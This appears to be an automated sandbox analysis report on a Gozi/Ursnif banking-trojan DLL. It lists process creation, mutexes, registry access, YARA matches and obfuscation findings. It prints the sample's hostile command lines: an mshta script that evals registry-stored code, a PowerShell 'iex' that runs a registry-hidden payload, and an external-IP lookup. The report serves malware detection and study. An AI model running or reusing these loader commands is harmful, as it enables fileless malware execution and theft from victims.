Source: C:\Windows\System32\control.exe Code function: 33_2_00AD9A34 33_2_00AD9A34
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE7218 33_2_00AE7218
Source: C:\Windows\System32\control.exe Code function: 33_2_00B0027C 33_2_00B0027C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFEA40 33_2_00AFEA40
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF6250 33_2_00AF6250
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFA3B2 33_2_00AFA3B2
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF03EC 33_2_00AF03EC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF93FC 33_2_00AF93FC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE6B00 33_2_00AE6B00
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEB378 33_2_00AEB378
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD7B44 33_2_00AD7B44
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADFCA0 33_2_00ADFCA0
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADECE0 33_2_00ADECE0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE1C0C 33_2_00AE1C0C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD5DA8 33_2_00AD5DA8
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE25A4 33_2_00AE25A4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD65D8 33_2_00AD65D8
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE75D8 33_2_00AE75D8
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE8DD0 33_2_00AE8DD0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE6528 33_2_00AE6528
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFC560 33_2_00AFC560
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF7D44 33_2_00AF7D44
Source: C:\Windows\System32\control.exe Code function: 33_2_00AECE90 33_2_00AECE90
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD96D8 33_2_00AD96D8
Source: C:\Windows\System32\control.exe Code function: 33_2_00B00614 33_2_00B00614
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD1600 33_2_00AD1600
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADDF58 33_2_00ADDF58
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675774B78 36_2_0000020675774B78
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675775428 36_2_0000020675775428
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576CE90 36_2_000002067576CE90
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757596D8 36_2_00000206757596D8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675755DA8 36_2_0000020675755DA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757625A4 36_2_00000206757625A4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577C560 36_2_000002067577C560
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675780614 36_2_0000020675780614
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675751600 36_2_0000020675751600
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757675D8 36_2_00000206757675D8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757565D8 36_2_00000206757565D8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675768DD0 36_2_0000020675768DD0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577A074 36_2_000002067577A074
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675769850 36_2_0000020675769850
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576D92C 36_2_000002067576D92C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576A0F0 36_2_000002067576A0F0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575DF58 36_2_000002067575DF58
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576782C 36_2_000002067576782C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576B814 36_2_000002067576B814
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067578027C 36_2_000002067578027C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675776250 36_2_0000020675776250
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675757B44 36_2_0000020675757B44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675766B00 36_2_0000020675766B00
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757549C4 36_2_00000206757549C4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575596C 36_2_000002067575596C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575DA3C 36_2_000002067575DA3C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577EA40 36_2_000002067577EA40
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576AA28 36_2_000002067576AA28
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675752A34 36_2_0000020675752A34
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675759A34 36_2_0000020675759A34
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577E220 36_2_000002067577E220
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675767218 36_2_0000020675767218
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757719FC 36_2_00000206757719FC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577A9FC 36_2_000002067577A9FC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757699F8 36_2_00000206757699F8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575B9E8 36_2_000002067575B9E8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757569DC 36_2_00000206757569DC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575FCA0 36_2_000002067575FCA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675777D44 36_2_0000020675777D44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675766528 36_2_0000020675766528
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067575ECE0 36_2_000002067575ECE0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577A3B2 36_2_000002067577A3B2
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067576B378 36_2_000002067576B378
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675761C0C 36_2_0000020675761C0C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757793FC 36_2_00000206757793FC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_00000206757703EC 36_2_00000206757703EC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067579138C 36_2_000002067579138C
PE / OLE file has an invalid certificate
Source: out.dll Static PE information: invalid certificate
PE file does not import any functions
Source: f1lrerxf.dll.26.dr Static PE information: No import functions for PE file found
Source: ntdrbunx.dll.29.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: out.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@28/33@7/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8229C CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00F8229C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{857C95B3-5D28-11EB-90E5-ECF4BB2D2496}.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A6C5620A-CD20-C84B-873A-517CAB0E1570}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8E231364-9555-F0A9-8FA2-992433F6DD98}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{EA8F1CAB-417E-AC42-1BBE-05A07FD209D4}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF75DD507BDBD79E0A.TMP Jump to behavior
Source: out.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: out.dll Virustotal: Detection: 36%
Source: out.dll ReversingLabs: Detection: 45%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\out.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: out.dll Static PE information: More than 200 imports for KERNEL32.dll
Source: out.dll Static PE information: More than 200 imports for USER32.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01385BD5
PE file contains sections with non-standard names
Source: out.dll Static PE information: section name: .data2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002193 push ecx; ret 0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002140 push ecx; ret 0_2_10002149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E6BE push esp; retf 0_2_00F8E6BF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AC00 push ecx; ret 0_2_00F8AC09
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E1AF push ebx; ret 0_2_00F8E1B2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E163 push edx; iretd 0_2_00F8E164
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AF33 push ecx; ret 0_2_00F8AF43
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FBBAD0 push edx; ret 0_2_00FBBBD4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3C54 push eax; iretd 0_2_00FB3C4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3C32 push eax; iretd 0_2_00FB3C4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB197F push ds; retf 0_2_00FB198D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB5EB0 push 0E0634C7h; retf 0_2_00FB5EB5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB16B6 push ecx; ret 0_2_00FB16B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB52B6 push esp; iretd 0_2_00FB52D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3205 push cs; retf 0_2_00FB3206
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3FFB pushad ; iretd 0_2_00FB400E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB33A6 push ds; ret 0_2_00FB33BB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A7177 push ecx; ret 0_2_013A7187
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A6E10 push ecx; ret 0_2_013A6E19
Source: C:\Windows\explorer.exe Code function: 32_2_04E0C131 push 3B000001h; retf 32_2_04E0C136
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFC131 push 3B000001h; retf 33_2_00AFC136
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577C131 push 3B000001h; retf 36_2_000002067577C136

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
